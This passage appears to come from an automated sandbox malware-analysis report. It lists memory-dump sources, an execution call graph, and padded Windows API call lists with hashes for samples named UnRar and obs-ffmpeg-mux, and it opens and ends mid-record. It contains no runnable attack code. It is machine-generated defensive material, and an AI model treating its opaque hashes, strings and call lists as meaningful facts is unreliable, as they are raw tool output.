                                                            • WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,00007FF7AACE2A2B,?,?,?,00007FF7AACCD44A,?,?,?), ref: 00007FF7AACE2B2F
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00007FF7AACE2A2B,?,?,?,00007FF7AACCD44A,?,?,?), ref: 00007FF7AACE2B3A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: ErrorLastObjectSingleWait
                                                            • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                            • API String ID: 1211598281-2248577382
                                                            • Opcode ID: 22a824227d2c6caa86385b7f3f1a8ffce9ae1a7f9d6426763e3823e6ecb769a1
                                                            • Instruction ID: 4c4ec4117eb1c5cf3ef12baad210b0ff1562e7b751f71e572fe2358ee2ae3a55
                                                            • Opcode Fuzzy Hash: 22a824227d2c6caa86385b7f3f1a8ffce9ae1a7f9d6426763e3823e6ecb769a1
                                                            • Instruction Fuzzy Hash: 18E01A21E1B802D1F650BB35AC91178A220AF60378FD253B0D07E529FE9F2CA54BC721

                                                            Execution Graph

                                                            Execution Coverage:7.6%
                                                            Dynamic/Decrypted Code Coverage:0%
                                                            Signature Coverage:2.5%
                                                            Total number of Nodes:403
                                                            Total number of Limit Nodes:9
                                                            execution_graph 83908 7ffda3785fa0 83921 7ffda378b000 83908->83921 83910 7ffda3785fbb 83911 7ffda3786104 83910->83911 83912 7ffda3785ff2 19 API calls 83910->83912 83929 7ffda3797130 83911->83929 83912->83911 83915 7ffda378616b 20 API calls 83916 7ffda378624e 83915->83916 83936 7ffda37971a0 83916->83936 83919 7ffda37863e1 83920 7ffda3786299 19 API calls 83920->83919 83922 7ffda378b074 83921->83922 83923 7ffda378b07f 83922->83923 83926 7ffda378b209 83922->83926 83924 7ffda378b1a6 83923->83924 83925 7ffda378b0a3 16 API calls 83923->83925 83924->83910 83925->83924 83927 7ffda378b449 83926->83927 83928 7ffda378b32a 17 API calls 83926->83928 83927->83910 83928->83927 83943 7ffda379b8d0 83929->83943 83931 7ffda3797152 83947 7ffda379d590 83931->83947 83935 7ffda3786156 83935->83915 83935->83916 83937 7ffda379b8d0 49 API calls 83936->83937 83938 7ffda37971b8 83937->83938 84156 7ffda379d410 83938->84156 83941 7ffda3799e60 47 API calls 83942 7ffda3786284 83941->83942 83942->83919 83942->83920 83944 7ffda379b8f3 83943->83944 83964 7ffda379e960 83944->83964 83946 7ffda379b905 Concurrency::details::ContextBase::GetWorkQueueIdentity 83946->83931 83993 7ffda379f830 83947->83993 83949 7ffda379d5b7 Concurrency::details::_Scheduler::_Scheduler 83997 7ffda37a5740 83949->83997 83957 7ffda379d654 84011 7ffda37a57c0 83957->84011 83960 7ffda3799e60 83961 7ffda3799e7a Concurrency::task_continuation_context::task_continuation_context 83960->83961 84129 7ffda3799f70 83961->84129 83963 7ffda3799e9c 83963->83935 83967 7ffda37a0c60 83964->83967 83968 7ffda37a0c7b Concurrency::details::WorkQueue::IsStructuredEmpty Concurrency::details::ContextBase::GetWorkQueueIdentity ~Mailbox 83967->83968 83971 7ffda37a7650 83968->83971 83970 7ffda379e976 83970->83946 83974 7ffda37a78b0 83971->83974 83973 7ffda37a766d Concurrency::details::ContextBase::GetWorkQueueIdentity 83973->83970 83979 7ffda37b2760 83974->83979 83980 7ffda37b278e 83979->83980 83981 7ffda37a78c8 83979->83981 83990 7ffda3781930 RtlPcToFileHeader RaiseException stdext::threads::lock_error::lock_error Concurrency::cancel_current_task 83980->83990 83983 7ffda37b27a0 83981->83983 83984 7ffda37b27b5 83983->83984 83985 7ffda37a78d0 83983->83985 83986 7ffda37b27cc 83984->83986 83987 7ffda37b27c0 83984->83987 83985->83973 83992 7ffda37819e0 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 83986->83992 83991 7ffda37c08b0 49 API calls 2 library calls 83987->83991 83990->83981 83991->83985 83992->83985 83994 7ffda379f857 Concurrency::event::wait std::_Fac_node::_Fac_node 83993->83994 84014 7ffda37a03f0 83994->84014 84019 7ffda37aeb10 83997->84019 84002 7ffda37a56b0 84077 7ffda37ae870 84002->84077 84005 7ffda37a56e0 84090 7ffda37ae950 84005->84090 84008 7ffda37a5790 84103 7ffda37aeb60 84008->84103 84116 7ffda37aec40 84011->84116 84015 7ffda37a040a Concurrency::details::ContextBase::GetWorkQueueIdentity 84014->84015 84016 7ffda379f8ee 84014->84016 84018 7ffda37a6560 55 API calls 84015->84018 84016->83949 84018->84016 84031 7ffda37bcaf0 84019->84031 84022 7ffda379d6b0 55 API calls 84023 7ffda37a576f 84022->84023 84024 7ffda379d6b0 84023->84024 84025 7ffda37a56b0 55 API calls 84024->84025 84026 7ffda379d6dd 84025->84026 84027 7ffda37a56e0 55 API calls 84026->84027 84028 7ffda379d701 84027->84028 84061 7ffda37a5710 84028->84061 84036 7ffda37c89d0 84031->84036 84034 7ffda379d6b0 55 API calls 84035 7ffda37aeb3f 84034->84035 84035->84022 84041 7ffda37d4690 84036->84041 84039 7ffda379d6b0 55 API calls 84040 7ffda37bcb1f 84039->84040 84040->84034 84046 7ffda37e26d0 84041->84046 84044 7ffda379d6b0 55 API calls 84045 7ffda37c89ff 84044->84045 84045->84039 84051 7ffda37f3830 84046->84051 84049 7ffda379d6b0 55 API calls 84050 7ffda37d46bf 84049->84050 84050->84044 84056 7ffda37f5300 84051->84056 84054 7ffda379d6b0 55 API calls 84055 7ffda37e26ff 84054->84055 84055->84049 84057 7ffda37f7650 55 API calls 84056->84057 84058 7ffda37f532f 84057->84058 84059 7ffda379d6b0 55 API calls 84058->84059 84060 7ffda37f385f 84059->84060 84060->84054 84064 7ffda37aea30 84061->84064 84065 7ffda37aea52 84064->84065 84068 7ffda379d5e8 84065->84068 84074 7ffda37bc960 49 API calls ~Mailbox 84065->84074 84067 7ffda37aea77 84067->84068 84075 7ffda37bca70 6 API calls std::exception::exception 84067->84075 84068->84002 84070 7ffda37aeaa7 84071 7ffda37a03f0 55 API calls 84070->84071 84072 7ffda37aeae4 84071->84072 84076 7ffda37a7b70 49 API calls ~Mailbox 84072->84076 84074->84067 84075->84070 84076->84068 84078 7ffda37ae892 84077->84078 84079 7ffda379d60c 84078->84079 84087 7ffda37bc640 49 API calls ~Mailbox 84078->84087 84079->84005 84081 7ffda37ae8b7 84081->84079 84088 7ffda37bc750 6 API calls std::exception::exception 84081->84088 84083 7ffda37ae8e7 84084 7ffda37a03f0 55 API calls 84083->84084 84085 7ffda37ae924 84084->84085 84089 7ffda37a7b70 49 API calls ~Mailbox 84085->84089 84087->84081 84088->84083 84089->84079 84091 7ffda37ae972 84090->84091 84092 7ffda379d630 84091->84092 84100 7ffda37bc7d0 49 API calls ~Mailbox 84091->84100 84092->84008 84094 7ffda37ae997 84094->84092 84101 7ffda37bc8e0 6 API calls std::exception::exception 84094->84101 84096 7ffda37ae9c7 84097 7ffda37a03f0 55 API calls 84096->84097 84098 7ffda37aea04 84097->84098 84102 7ffda37a7b70 49 API calls ~Mailbox 84098->84102 84100->84094 84101->84096 84102->84092 84104 7ffda37aeb82 84103->84104 84112 7ffda37a57b0 84104->84112 84113 7ffda37bcb40 49 API calls ~Mailbox 84104->84113 84106 7ffda37aeba7 84106->84112 84114 7ffda37bcc50 6 API calls std::exception::exception 84106->84114 84108 7ffda37aebd7 84109 7ffda37a03f0 55 API calls 84108->84109 84110 7ffda37aec14 84109->84110 84115 7ffda37a7b70 49 API calls ~Mailbox 84110->84115 84112->83957 84113->84106 84114->84108 84115->84112 84117 7ffda37aec62 84116->84117 84125 7ffda3797189 84117->84125 84126 7ffda37bccd0 49 API calls ~Mailbox 84117->84126 84119 7ffda37aec87 84119->84125 84127 7ffda37bcde0 6 API calls std::exception::exception 84119->84127 84121 7ffda37aecb7 84122 7ffda37a03f0 55 API calls 84121->84122 84123 7ffda37aecf4 84122->84123 84128 7ffda37a7b70 49 API calls ~Mailbox 84123->84128 84125->83960 84126->84119 84127->84121 84128->84125 84132 7ffda379ddb0 84129->84132 84137 7ffda379fbc0 84132->84137 84134 7ffda379ddc3 Concurrency::details::WorkQueue::IsStructuredEmpty Concurrency::details::ContextBase::GetWorkQueueIdentity ~Mailbox 84141 7ffda37a5d30 84134->84141 84138 7ffda379fbd3 ~Mailbox 84137->84138 84139 7ffda379fc0c 84138->84139 84144 7ffda37a0a70 47 API calls 3 library calls 84138->84144 84139->84134 84145 7ffda37affe0 84141->84145 84144->84139 84148 7ffda37b2aa0 84145->84148 84151 7ffda3799a20 84148->84151 84150 7ffda3799f86 84150->83963 84152 7ffda3799a48 84151->84152 84153 7ffda3799a39 84151->84153 84152->84150 84155 7ffda3781a00 47 API calls _invalid_parameter_noinfo_noreturn 84153->84155 84155->84152 84169 7ffda379f760 84156->84169 84158 7ffda379d42d Concurrency::details::_Scheduler::_Scheduler 84173 7ffda37a5600 84158->84173 84166 7ffda379d4ca DName::DName 84187 7ffda37a5680 84166->84187 84170 7ffda379f787 Concurrency::event::wait std::_Fac_node::_Fac_node 84169->84170 84190 7ffda37a0440 84170->84190 84195 7ffda37ae660 84173->84195 84178 7ffda37a5570 84253 7ffda37ae3c0 84178->84253 84181 7ffda37a55a0 84266 7ffda37ae4a0 84181->84266 84184 7ffda37a5650 84279 7ffda37ae6b0 84184->84279 84292 7ffda37ae790 84187->84292 84191 7ffda37a045a Concurrency::details::ContextBase::GetWorkQueueIdentity 84190->84191 84192 7ffda379f81e 84190->84192 84194 7ffda37a6640 55 API calls 84191->84194 84192->84158 84194->84192 84207 7ffda37bc2d0 84195->84207 84198 7ffda379d510 55 API calls 84199 7ffda37a562f 84198->84199 84200 7ffda379d510 84199->84200 84201 7ffda37a5570 55 API calls 84200->84201 84202 7ffda379d53d 84201->84202 84203 7ffda37a55a0 55 API calls 84202->84203 84204 7ffda379d561 84203->84204 84237 7ffda37a55d0 84204->84237 84212 7ffda37c8430 84207->84212 84210 7ffda379d510 55 API calls 84211 7ffda37ae68f 84210->84211 84211->84198 84217 7ffda37d40f0 84212->84217 84215 7ffda379d510 55 API calls 84216 7ffda37bc2ff 84215->84216 84216->84210 84222 7ffda37e2360 84217->84222 84220 7ffda379d510 55 API calls 84221 7ffda37c845f 84220->84221 84221->84215 84227 7ffda37f37e0 84222->84227 84225 7ffda379d510 55 API calls 84226 7ffda37d411f 84225->84226 84226->84220 84232 7ffda37f52b0 84227->84232 84230 7ffda379d510 55 API calls 84231 7ffda37e238f 84230->84231 84231->84225 84233 7ffda37f7600 55 API calls 84232->84233 84234 7ffda37f52df 84233->84234 84235 7ffda379d510 55 API calls 84234->84235 84236 7ffda37f380f 84235->84236 84236->84230 84240 7ffda37ae580 84237->84240 84242 7ffda37ae5a2 84240->84242 84241 7ffda379d45e 84241->84178 84242->84241 84250 7ffda37bc140 49 API calls ~Mailbox 84242->84250 84244 7ffda37ae5c7 84244->84241 84251 7ffda37bc250 6 API calls std::exception::exception 84244->84251 84246 7ffda37ae5f7 84247 7ffda37a0440 55 API calls 84246->84247 84248 7ffda37ae634 84247->84248 84252 7ffda37a7b70 49 API calls ~Mailbox 84248->84252 84250->84244 84251->84246 84252->84241 84254 7ffda37ae3e2 84253->84254 84262 7ffda379d482 84254->84262 84263 7ffda37bbe20 49 API calls ~Mailbox 84254->84263 84256 7ffda37ae407 84256->84262 84264 7ffda37bbf30 6 API calls std::exception::exception 84256->84264 84258 7ffda37ae437 84259 7ffda37a0440 55 API calls 84258->84259 84260 7ffda37ae474 84259->84260 84265 7ffda37a7b70 49 API calls ~Mailbox 84260->84265 84262->84181 84263->84256 84264->84258 84265->84262 84267 7ffda37ae4c2 84266->84267 84275 7ffda379d4a6 84267->84275 84276 7ffda37bbfb0 49 API calls ~Mailbox 84267->84276 84269 7ffda37ae4e7 84269->84275 84277 7ffda37bc0c0 6 API calls std::exception::exception 84269->84277 84271 7ffda37ae517 84272 7ffda37a0440 55 API calls 84271->84272 84273 7ffda37ae554 84272->84273 84278 7ffda37a7b70 49 API calls ~Mailbox 84273->84278 84275->84184 84276->84269 84277->84271 84278->84275 84280 7ffda37ae6d2 84279->84280 84288 7ffda37a5670 84280->84288 84289 7ffda37bc320 49 API calls ~Mailbox 84280->84289 84282 7ffda37ae6f7 84282->84288 84290 7ffda37bc430 6 API calls std::exception::exception 84282->84290 84284 7ffda37ae727 84285 7ffda37a0440 55 API calls 84284->84285 84286 7ffda37ae764 84285->84286 84291 7ffda37a7b70 49 API calls ~Mailbox 84286->84291 84288->84166 84289->84282 84290->84284 84291->84288 84293 7ffda37ae7b2 84292->84293 84294 7ffda37971df 84293->84294 84302 7ffda37bc4b0 84293->84302 84294->83941 84296 7ffda37ae7d7 84296->84294 84308 7ffda37bc5c0 84296->84308 84298 7ffda37ae807 84299 7ffda37a0440 55 API calls 84298->84299 84300 7ffda37ae844 84299->84300 84312 7ffda37a7b70 49 API calls ~Mailbox 84300->84312 84303 7ffda37bc507 84302->84303 84304 7ffda37bc593 ~Mailbox 84302->84304 84313 7ffda37c8590 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 84303->84313 84304->84296 84306 7ffda37bc579 84314 7ffda37b2b90 49 API calls ~Mailbox 84306->84314 84309 7ffda37bc5e2 std::exception::exception 84308->84309 84315 7ffda37c85e0 84309->84315 84311 7ffda37bc5f8 84311->84298 84312->84294 84313->84306 84314->84304 84316 7ffda37c860f std::_Fac_node::_Fac_node 84315->84316 84319 7ffda37d42a0 84316->84319 84318 7ffda37c861e 84318->84311 84324 7ffda37d84b0 84319->84324 84322 7ffda37d4314 84322->84318 84325 7ffda37d84d9 84324->84325 84329 7ffda37d42ce 84324->84329 84334 7ffda38179cc AcquireSRWLockExclusive SleepConditionVariableSRW ReleaseSRWLockExclusive 84325->84334 84330 7ffda37fac60 84329->84330 84331 7ffda37fac84 Concurrency::task_continuation_context::task_continuation_context 84330->84331 84333 7ffda37fac8b 84331->84333 84335 7ffda37fdf50 84331->84335 84333->84322 84338 7ffda37feda0 84335->84338 84339 7ffda37ff270 222 API calls 84338->84339 84340 7ffda37fdf8b 84339->84340 84340->84333 84341 7ffda37978c0 84348 7ffda379bec0 84341->84348 84343 7ffda37978e7 84352 7ffda379bd00 84343->84352 84347 7ffda379794d 84349 7ffda379bee3 84348->84349 84350 7ffda379e960 49 API calls 84349->84350 84351 7ffda379bef5 Concurrency::details::ContextBase::GetWorkQueueIdentity 84350->84351 84351->84343 84369 7ffda379ecd0 84352->84369 84354 7ffda379bd2a Concurrency::details::_Scheduler::_Scheduler 84373 7ffda37a44c0 84354->84373 84362 7ffda379bdc7 84387 7ffda37a4540 84362->84387 84365 7ffda3799e10 84366 7ffda3799e2a Concurrency::task_continuation_context::task_continuation_context 84365->84366 84367 7ffda3799f70 ~Mailbox 47 API calls 84366->84367 84368 7ffda3799e4c 84367->84368 84368->84347 84370 7ffda379ecf7 Concurrency::event::wait std::_Fac_node::_Fac_node 84369->84370 84390 7ffda37a0850 84370->84390 84395 7ffda37aa910 84373->84395 84378 7ffda37a4430 84458 7ffda37aa670 84378->84458 84381 7ffda37a4460 84471 7ffda37aa750 84381->84471 84384 7ffda37a4510 84484 7ffda37aa960 84384->84484 84497 7ffda37aaa40 84387->84497 84391 7ffda37a086a Concurrency::details::ContextBase::GetWorkQueueIdentity 84390->84391 84392 7ffda379ed8e 84390->84392 84394 7ffda37a71a0 55 API calls 84391->84394 84392->84354 84394->84392 84407 7ffda37b5890 84395->84407 84398 7ffda379be40 55 API calls 84399 7ffda37a44ef 84398->84399 84400 7ffda379be40 84399->84400 84401 7ffda37a4430 55 API calls 84400->84401 84402 7ffda379be6d 84401->84402 84403 7ffda37a4460 55 API calls 84402->84403 84404 7ffda379be91 84403->84404 84442 7ffda37a4490 84404->84442 84412 7ffda37c37f0 84407->84412 84410 7ffda379be40 55 API calls 84411 7ffda37aa93f 84410->84411 84411->84398 84417 7ffda37cf670 84412->84417 84415 7ffda379be40 55 API calls 84416 7ffda37b58bf 84415->84416 84416->84410 84422 7ffda37df4b0 84417->84422 84420 7ffda379be40 55 API calls 84421 7ffda37c381f 84420->84421 84421->84415 84427 7ffda37f3170 84422->84427 84425 7ffda379be40 55 API calls 84426 7ffda37cf69f 84425->84426 84426->84420 84432 7ffda37f4bf0 84427->84432 84430 7ffda379be40 55 API calls 84431 7ffda37df4df 84430->84431 84431->84425 84437 7ffda37f6f90 84432->84437 84435 7ffda379be40 55 API calls 84436 7ffda37f319f 84435->84436 84436->84430 84438 7ffda37f8be0 55 API calls 84437->84438 84439 7ffda37f6fbf 84438->84439 84440 7ffda379be40 55 API calls 84439->84440 84441 7ffda37f4c1f 84440->84441 84441->84435 84445 7ffda37aa830 84442->84445 84446 7ffda37aa852 84445->84446 84447 7ffda379bd5b 84446->84447 84455 7ffda37b5700 49 API calls ~Mailbox 84446->84455 84447->84378 84449 7ffda37aa877 84449->84447 84456 7ffda37b5810 6 API calls std::exception::exception 84449->84456 84451 7ffda37aa8a7 84452 7ffda37a0850 55 API calls 84451->84452 84453 7ffda37aa8e4 84452->84453 84457 7ffda37a7c00 49 API calls ~Mailbox 84453->84457 84455->84449 84456->84451 84457->84447 84459 7ffda37aa692 84458->84459 84460 7ffda379bd7f 84459->84460 84468 7ffda37b53e0 49 API calls ~Mailbox 84459->84468 84460->84381 84462 7ffda37aa6b7 84462->84460 84469 7ffda37b54f0 6 API calls std::exception::exception 84462->84469 84464 7ffda37aa6e7 84465 7ffda37a0850 55 API calls 84464->84465 84466 7ffda37aa724 84465->84466 84470 7ffda37a7c00 49 API calls ~Mailbox 84466->84470 84468->84462 84469->84464 84470->84460 84472 7ffda37aa772 84471->84472 84480 7ffda379bda3 84472->84480 84481 7ffda37b5570 49 API calls ~Mailbox 84472->84481 84474 7ffda37aa797 84474->84480 84482 7ffda37b5680 6 API calls std::exception::exception 84474->84482 84476 7ffda37aa7c7 84477 7ffda37a0850 55 API calls 84476->84477 84478 7ffda37aa804 84477->84478 84483 7ffda37a7c00 49 API calls ~Mailbox 84478->84483 84480->84384 84481->84474 84482->84476 84483->84480 84485 7ffda37aa982 84484->84485 84493 7ffda37a4530 84485->84493 84494 7ffda37b58e0 49 API calls ~Mailbox 84485->84494 84487 7ffda37aa9a7 84487->84493 84495 7ffda37b59f0 6 API calls std::exception::exception 84487->84495 84489 7ffda37aa9d7 84490 7ffda37a0850 55 API calls 84489->84490 84491 7ffda37aaa14 84490->84491 84496 7ffda37a7c00 49 API calls ~Mailbox 84491->84496 84493->84362 84494->84487 84495->84489 84496->84493 84498 7ffda37aaa62 84497->84498 84501 7ffda3797938 84498->84501 84507 7ffda37b5a70 84498->84507 84500 7ffda37aaa87 84500->84501 84513 7ffda37b5b80 84500->84513 84501->84365 84503 7ffda37aaab7 84504 7ffda37a0850 55 API calls 84503->84504 84505 7ffda37aaaf4 84504->84505 84517 7ffda37a7c00 49 API calls ~Mailbox 84505->84517 84508 7ffda37b5ac7 84507->84508 84512 7ffda37b5b53 ~Mailbox 84507->84512 84518 7ffda37c3950 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 84508->84518 84510 7ffda37b5b39 84519 7ffda37b2b90 49 API calls ~Mailbox 84510->84519 84512->84500 84514 7ffda37b5ba2 std::exception::exception 84513->84514 84520 7ffda37c39b0 84514->84520 84516 7ffda37b5bb8 84516->84503 84517->84501 84518->84510 84519->84512 84521 7ffda37c39df std::_Fac_node::_Fac_node 84520->84521 84524 7ffda37cf840 84521->84524 84523 7ffda37c39ee 84523->84516 84529 7ffda37da120 84524->84529 84527 7ffda37cf8b4 84527->84523 84530 7ffda37da149 84529->84530 84534 7ffda37cf86e 84529->84534 84539 7ffda38179cc AcquireSRWLockExclusive SleepConditionVariableSRW ReleaseSRWLockExclusive 84530->84539 84535 7ffda37fae30 84534->84535 84537 7ffda37fae54 Concurrency::task_continuation_context::task_continuation_context 84535->84537 84536 7ffda37fae5b 84536->84527 84537->84536 84540 7ffda37fdfa0 84537->84540 84543 7ffda37fedd0 84540->84543 84546 7ffda37ff530 84543->84546 84547 7ffda3800450 VirtualAlloc 84546->84547 84548 7ffda37fdfdb 84547->84548 84548->84536

                                                            Executed Functions

                                                            Function 00007FFDA3785FA0 Relevance: 107.0, APIs: 58, Strings: 3, Instructions: 265threadmemorywindowCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 0 7ffda3785fa0-7ffda3785fec call 7ffda378b000 3 7ffda3786104-7ffda3786165 call 7ffda3796ee0 call 7ffda3797130 0->3 4 7ffda3785ff2-7ffda3786103 DebugActiveProcessStop HeapSetInformation SetFileIoOverlappedRange WaitForThreadpoolIoCallbacks GetLastError ApplicationRecoveryFinished DuplicateHandle Wow64EnableWow64FsRedirection GetNumaProcessorNodeEx HeapReAlloc SetFileAttributesW GetNumaNodeNumberFromHandle FindClose GetModuleHandleW GetLargestConsoleWindowSize CopyFile2 LocalAlloc GetCommConfig AddResourceAttributeAce 0->4 9 7ffda378624e-7ffda378627f call 7ffda3796ee0 call 7ffda37971a0 3->9 10 7ffda378616b-7ffda378624d SetThreadDesktop EndMenu GetTopWindow SetCursorPos AttachThreadInput FlashWindowEx DdeQueryNextServer GetPhysicallyInstalledSystemMemory QueryMemoryResourceNotification MoveFileExW SetThreadIdealProcessor FlashWindow CreateDialogParamW SetTapePosition SetThreadAffinityMask DeleteMenu IsDBCSLeadByte FlashWindowEx GetSystemInfo PaintDesktop 3->10 4->3 14 7ffda3786284-7ffda3786293 9->14 10->9 15 7ffda37863e1-7ffda37863ea 14->15 16 7ffda3786299-7ffda37863e0 SleepConditionVariableCS ResolveLocaleName IsWow64Process GetLogicalProcessorInformation SetFileBandwidthReservation DeviceIoControl FileTimeToLocalFileTime FindResourceExW AllocateUserPhysicalPages WaitForThreadpoolTimerCallbacks LoadLibraryW GetCurrentProcess FindClose EnumResourceLanguagesW ConvertThreadToFiberEx EnumDateFormatsExW ReadDirectoryChangesW GetConsoleAliasesLengthW FindNextVolumeMountPointW 14->16 16->15
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            • Associated: 00000007.00000002.2334990635.00007FFDA3780000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA3845000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA385D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335606542.00007FFDA386E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335722973.00007FFDA386F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336848003.00007FFDA38D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336967154.00007FFDA38DA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: File$ThreadWindow$Resource$Find$CloseConsoleDesktopFlashHandleInfoMenuProcessProcessorSystemThreadpoolWaitWow64$ActiveAllocAttributeCallbacksDialogEnumHeapInformationLastLocalMemoryNextNodeNotificationNumaQueryTime$AffinityAliasesAllocateApplicationAttachAttributesBandwidthByteChangesCodeCommConditionConfigControlConvertCopyCreateCurrentCursorDateDebugDeleteDeviceDirectoryDrawDuplicateEnableErrorFiberFile2FinishedFirmwareFormatsFreeFromGlobalHeaderIdealInputInstalledLanguagesLargestLeadLengthLibraryLoadLocaleLockLogicalMaskMessageModuleMountMoveNameNumberOutputOverlappedPagePagesPaintParamPhysicalPhysicallyPointPopupPositionPostPowerRangeReadRecoveryRedirectionReservationResolveServerSettingSizeSleepStateStopSwitchTableTapeTimerUnregisterUserVariableVolumeWrite
                                                            • String ID: U41xISt2E5PfM97cQ$XX3g77F5HT8M6k5WDdakNi8Eupb$v8PoCDA5sLOX7U2A
                                                            • API String ID: 650054826-2015865665
                                                            • Opcode ID: 20fe0e45759f5d98e0cddd9f63ce774724192778df083206e93819e25c1cbadb
                                                            • Instruction ID: dac851834efa898838279c03b052eb5dbedde22f2352410d6f44e33149068d7f
                                                            • Opcode Fuzzy Hash: 20fe0e45759f5d98e0cddd9f63ce774724192778df083206e93819e25c1cbadb
                                                            • Instruction Fuzzy Hash: 88C10C32B1965183FB28DB35A83972F3263BF8C745F808479D54B59EA5CE7FD0498608
                                                            Function 00007FFDA378C6E0 Relevance: 98.4, APIs: 50, Strings: 6, Instructions: 358timethreadfileCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            • Associated: 00000007.00000002.2334990635.00007FFDA3780000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA3845000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA385D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335606542.00007FFDA386E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335722973.00007FFDA386F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336848003.00007FFDA38D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336967154.00007FFDA38DA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: File$TimeTimer$DeleteFindMetaPrivateProcessorQueueVolume$AllocCallbackCloseCommErrorGlobalInfoLocaleModeNamespaceNextPalettePathPointProfileReadReturnsSearchSectionStringThreadWaitWhen$AtomBackupBitsCalendarCallbacksChangeCharCharacterClearClipCompletionConditionConfigConsoleCountCreateCriticalDirectoryEntriesEnumEventExtentFloatFormatFormatsHandleIdealIndexInformationInitializeLeaveLockMaskMaximumModesModuleMountNameNearestNodeNotificationNumaObjectOutputPowerResourceScriptsSelectSignalStatusSystemTextThreadpoolVariableVerifyWidthsWorkWriteZone
                                                            • String ID: 2$3beTmmvvC1F63K6WHrvVsGv7OJ2FX$8kO67Lgmh5GSUFA3182fPOFX$Z2twrKMZ8US6xow9ITlLK8v64FbnJ$dnFYjpitjQgEfAJRPfIZt$mkcBMg2fpqwYIVXp1ZWoGeDUp
                                                            • API String ID: 121820331-87464429
                                                            • Opcode ID: c2fd8ee2fc22ef0c0a9b2e5c7f9df47ea036286290a7ecbbecefd5d62d6efba5
                                                            • Instruction ID: 42bd213dce033f75c2170114097babbe25ab88710f7576d074b65dd49ce92c54
                                                            • Opcode Fuzzy Hash: c2fd8ee2fc22ef0c0a9b2e5c7f9df47ea036286290a7ecbbecefd5d62d6efba5
                                                            • Instruction Fuzzy Hash: 4CF13C32B192518BE728DF79E465B2E77A2FB89704F508039E64A96E59CF3FD4048B04
                                                            Function 00007FFDA37890E0 Relevance: 91.4, APIs: 48, Strings: 4, Instructions: 361threadtimememoryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            • Associated: 00000007.00000002.2334990635.00007FFDA3780000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA3845000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA385D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335606542.00007FFDA386E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335722973.00007FFDA386F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336848003.00007FFDA38D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336967154.00007FFDA38DA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
